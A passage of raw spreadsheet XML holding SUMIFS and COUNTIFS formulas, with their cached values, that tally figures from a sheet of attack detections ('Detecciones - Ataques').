        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*"))</f>
        <v>0.3760526316</v>
      </c>
      <c r="GE50" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY50)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY50 &amp; "*"))</f>
        <v>0.4</v>
      </c>
    </row>
    <row r="51">
      <c r="B51" s="277"/>
      <c r="C51" s="271"/>
      <c r="D51" s="271"/>
      <c r="E51" s="271"/>
      <c r="F51" s="271"/>
      <c r="G51" s="278"/>
      <c r="J51" s="277"/>
      <c r="K51" s="352" t="s">
        <v>2522</v>
      </c>
      <c r="L51" s="403" t="s">
        <v>2523</v>
      </c>
      <c r="M51" s="403" t="s">
        <v>2524</v>
      </c>
      <c r="N51" s="404" t="s">
        <v>2525</v>
      </c>
      <c r="O51" s="278"/>
      <c r="Q51" s="271"/>
      <c r="R51" s="352" t="s">
        <v>2503</v>
      </c>
      <c r="S51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>28671</v>
      </c>
      <c r="T51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>27785</v>
      </c>
      <c r="U51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>212</v>
      </c>
      <c r="V51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>88</v>
      </c>
      <c r="W51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>35</v>
      </c>
      <c r="X51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>110431</v>
      </c>
      <c r="Y51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>580</v>
      </c>
      <c r="Z51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>387399</v>
      </c>
      <c r="AA51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>494</v>
      </c>
      <c r="AB51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>413</v>
      </c>
      <c r="AC51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>103</v>
      </c>
      <c r="AD51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>3430</v>
      </c>
      <c r="AE51" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>87</v>
      </c>
      <c r="AF51" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>6534</v>
      </c>
      <c r="AG51" s="271"/>
      <c r="AH51" s="352" t="s">
        <v>2503</v>
      </c>
      <c r="AI51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>28644</v>
      </c>
      <c r="AJ51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>3</v>
      </c>
      <c r="AK51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>23</v>
      </c>
      <c r="AL51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>1</v>
      </c>
      <c r="AM51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>27785</v>
      </c>
      <c r="AN51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>124</v>
      </c>
      <c r="AR51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>13</v>
      </c>
      <c r="AS51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>40</v>
      </c>
      <c r="AU51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>29</v>
      </c>
      <c r="AV51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>6</v>
      </c>
      <c r="AW51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>41</v>
      </c>
      <c r="AY51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>12</v>
      </c>
      <c r="BA51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>35</v>
      </c>
      <c r="BB51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>110276</v>
      </c>
      <c r="BD51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>147</v>
      </c>
      <c r="BF51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>5</v>
      </c>
      <c r="BG51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>3</v>
      </c>
      <c r="BH51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>397</v>
      </c>
      <c r="BI51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>3</v>
      </c>
      <c r="BJ51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>3</v>
      </c>
      <c r="BK51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>30</v>
      </c>
      <c r="BL51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>4</v>
      </c>
      <c r="BM51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>271482</v>
      </c>
      <c r="BN51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>115913</v>
      </c>
      <c r="BO51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>208</v>
      </c>
      <c r="BR51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>14</v>
      </c>
      <c r="BT51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>5</v>
      </c>
      <c r="BU51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>1</v>
      </c>
      <c r="BW51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>12</v>
      </c>
      <c r="BX51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>71</v>
      </c>
      <c r="BZ51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>136</v>
      </c>
      <c r="CA51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>6</v>
      </c>
      <c r="CC51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>3</v>
      </c>
      <c r="CE51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>9</v>
      </c>
      <c r="CG51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>10</v>
      </c>
      <c r="CI51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>35</v>
      </c>
      <c r="CJ51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>3</v>
      </c>
      <c r="CK51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>19</v>
      </c>
      <c r="CL51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>304</v>
      </c>
      <c r="CN51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>1</v>
      </c>
      <c r="CO51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>24</v>
      </c>
      <c r="CP51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>65</v>
      </c>
      <c r="CQ51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>13</v>
      </c>
      <c r="CR51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>3387</v>
      </c>
      <c r="CT51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>11</v>
      </c>
      <c r="CU51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>7</v>
      </c>
      <c r="CW51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>25</v>
      </c>
      <c r="CY51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>43</v>
      </c>
      <c r="CZ51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>19</v>
      </c>
      <c r="DE51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>15</v>
      </c>
      <c r="DF51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>10</v>
      </c>
      <c r="DG51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH51" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FU3:$FU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>932</v>
      </c>
